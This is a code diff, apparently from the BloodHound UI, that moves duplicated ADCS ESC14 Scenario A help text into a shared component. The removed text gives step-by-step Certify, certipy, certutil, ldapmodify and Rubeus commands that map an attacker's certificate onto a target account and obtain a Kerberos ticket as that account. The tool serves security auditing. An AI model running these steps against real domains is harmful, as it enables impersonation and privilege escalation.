PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate - mapping string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + Targeted Kerberoast attack @@ -576,115 +470,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } else { @@ -819,115 +605,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx index b74ed57f21e..527b92b7806 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/General.tsx @@ -29,8 +29,9 @@ const General: FC = ({ sourceName, sourceType, targetName, target The altSecurityIdentities attribute allows you to specify explicit certificate mappings for a - principal. An explicit certificate mapping is a reference to a certificate, which can be used to - authenticate as the principal. + principal. An explicit certificate mapping directly links a specific certificate to the principal, as an + alternative to the normal certificate-to-account mapping rules and allowing authentication as that + principal. ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx index 66fff611b33..81b71d343df 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/LinuxAbuse.tsx @@ -14,113 +14,17 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Link, Typography } from '@mui/material'; +import { Typography } from '@mui/material'; import { FC } from 'react'; -import CodeController from '../CodeController/CodeController'; -import { EdgeInfoProps } from '../index'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; -const LinuxAbuse: FC = () => { +const LinuxAbuse: FC = () => { return ( <> The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring - to a certificate in the attacker's possession, and then use this certificate to authenticate as the - target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the certificate - typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} - meets these requirements and grants Domain Computers enrollment rights. The target can still be a - user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - Step 1: Obtain certificate - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable and - cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does - not have their mail or dNSHostName attribute set, which is required by the certificate template. The - mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be - set on computer objects. Computers have validated write permission to their own dNSHostName attribute by - default, but neither users nor computers can write to their own mail attribute by default. - - Step 2: Get certificate mapping identifier - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - Step 3: Add certificate mapping on target - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' attribute - of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\nadd: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - Step 4: Authenticate as target - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate and the - IP of a DC: - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - Step 5: Remove certificate mapping on target (clean-up) - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping string from - the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\ndelete: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx index d17034991d3..d8ce3b76226 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx @@ -14,10 +14,10 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Link, Typography } from '@mui/material'; +import { Typography } from '@mui/material'; import { FC } from 'react'; -import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; const WindowsAbuse: FC = () => { return ( @@ -25,110 +25,7 @@ const WindowsAbuse: FC = () => { The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring - to a certificate in the attacker's possession, and then use this certificate to authenticate as the - target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the certificate - typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} - meets these requirements and grants Domain Computers enrollment rights. The target can still be a - user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - Step 1: Obtain certificate - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable and - cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does - not have their mail or dNSHostName attribute set, which is required by the certificate template. The - mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be - set on computer objects. Computers have validated write permission to their own dNSHostName attribute by - default, but neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the certificate - as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - Step 2: Get certificate mapping identifier - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate public key using certutil: - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - Step 3: Add certificate mapping on target - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - Verify the that the mapping was added using Get-AltSecIDMapping: - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - Step 4: Authenticate as target - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity, - and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - Step 5: Remove certificate mapping on target (clean-up) - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate mapping - string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx index f99c396ede8..956a19b108e 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = ({ @@ -201,104 +202,7 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate - and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); case 'Computer': @@ -417,106 +321,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } else { @@ -591,106 +396,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index 2102fe16011..b5025f0219d 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -220,114 +221,7 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - 